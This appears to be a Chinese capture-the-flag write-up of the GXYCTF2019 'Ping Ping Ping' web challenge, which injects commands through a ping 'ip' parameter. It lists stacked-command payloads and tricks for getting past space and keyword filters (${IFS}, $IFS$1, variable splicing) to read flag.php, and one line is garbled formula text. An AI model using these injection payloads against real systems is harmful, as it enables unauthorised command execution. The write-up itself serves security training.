[GXYCTF2019]Ping Ping Ping 1

题目环境
image.png

给了一个ip参数
注意题目Ping Ping Ping
意思就是让我们进行Ping地址
随便输入一个地址Ping一下

URL?ip=0
[GXYCTF2019]Ping Ping Ping 1_第1张图片

有回显结果,和上题类似
[ACTF2020 新生赛]Exec 1-CSDN博客

查看当前目录文件
URL?ip=0;ls(这里使用堆叠注入查询)
[GXYCTF2019]Ping Ping Ping 1_第2张图片
直接给出了咱们flag文件,事实上真的有这么简单吗?
查看flag文件看看是什么情况
URL?ip=0;cat flag.php
image.png
空格报错!
查看flag关键字是否被过滤
URL?ip=0;flag.php
image.png
flag报错!
查看字符是否被过滤
URL?ip=0;/
image.png
字符报错!
好啊好啊,过滤这么多东西,不过好在/符号不用绕过了,因为flag就在当前目录
空格绕过

  1. cat${IFS}flag.txt
  2. cat$IFS$9flag.txt (正整数可以是任意)
  3. cat
  4. cat<>flag.txt
  5. {cat,flag.txt}

flag关键字绕过

可以使用定义变量绕过
x = a g f a x=ag fa x=agfax=flag

构造payload:
**URL?ip=0;x=ag;cat${IFS}fl$x.php**
image.png
字符报错!
猜测"{}"被过滤
试试第二种空格绕过方法
构造payload:
**URL?ip=0;x=ag;cat$IFS$1fl$x.php**
[GXYCTF2019]Ping Ping Ping 1_第3张图片
有回显结果,绕过成功,但是没有发现flag,F12查看网页源代码,看看有没有flag
[GXYCTF2019]Ping Ping Ping 1_第4张图片
得出flag:
flag{08512195-033d-4f18-a5b0-00dcbc58c4b8}

你可能感兴趣的:(CTF做题笔记,网络安全,web安全,linux)